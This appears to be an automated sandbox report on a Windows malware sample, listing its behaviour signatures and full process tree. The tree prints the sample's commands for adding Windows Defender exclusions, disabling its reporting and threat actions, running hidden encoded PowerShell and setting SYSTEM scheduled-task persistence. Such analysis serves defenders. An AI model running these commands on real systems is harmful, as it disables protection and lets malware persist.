Analysis
-
max time kernel
134s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
25-01-2023 10:59
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
38a593f57b168d0c9a0b659a77243d12
-
SHA1
a3c10181d35c747687d15d023277a1f3a40d5815
-
SHA256
7d87031a25997b0f8104509b6fbc0efe5bff9d51e525297ffe92a4f9688d6ab8
-
SHA512
14aa028b21afcdb569753cf8995c6e8c51f8d8977a7a4389042d1762d00e1b0cfdda682b132dbf69cd165554d5f80950daee21b58598d627fe57c833f297027b
-
SSDEEP
196608:91OJC2/ztd+v19I/FKV9bv+DUPp+XOwTHS0hdCjHE6u:3OJfLtdaGKXJPp++wDRhQc
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 27 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 44 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS74B8.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS7777.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gskktOmwd" /SC once /ST 01:08:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gskktOmwd"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gskktOmwd"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bLqLKLLaYUqLtSzfKw" /SC once /ST 12:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\AklpEYo.exe\" Pi /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\AklpEYo.exeC:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\CllXbpirgIktGNO\AklpEYo.exe Pi /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FsFQcVpRNSNUC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FsFQcVpRNSNUC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ftljgLlqPYjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ftljgLlqPYjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gtYbQvtxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gtYbQvtxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mpIiGdOCcMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mpIiGdOCcMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\jxOPGMlVxWbacrVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\jxOPGMlVxWbacrVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\THZROCWpyYwmtzQt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\THZROCWpyYwmtzQt\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BKLfbgsFFbyBAmZWNsR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsFQcVpRNSNUC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FsFQcVpRNSNUC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ftljgLlqPYjU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ftljgLlqPYjU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtYbQvtxU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gtYbQvtxU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpIiGdOCcMUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpIiGdOCcMUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\jxOPGMlVxWbacrVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\jxOPGMlVxWbacrVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\KKZBahpSWposEVZUD /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\THZROCWpyYwmtzQt /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\THZROCWpyYwmtzQt /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkyVDvpjj" /SC once /ST 07:58:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkyVDvpjj"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkyVDvpjj"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RVtwMREJXQsvxhCBJ" /SC once /ST 06:15:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\arOmmdb.exe\" VC /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "RVtwMREJXQsvxhCBJ"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\arOmmdb.exeC:\Windows\Temp\THZROCWpyYwmtzQt\fatNgZIsyyqodQs\arOmmdb.exe VC /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bLqLKLLaYUqLtSzfKw"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\gtYbQvtxU\oKsGEA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FCAPlZuTAsqwUyW" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FCAPlZuTAsqwUyW2" /F /xml "C:\Program Files (x86)\gtYbQvtxU\Gyrowbh.xml" /RU "SYSTEM"2⤵
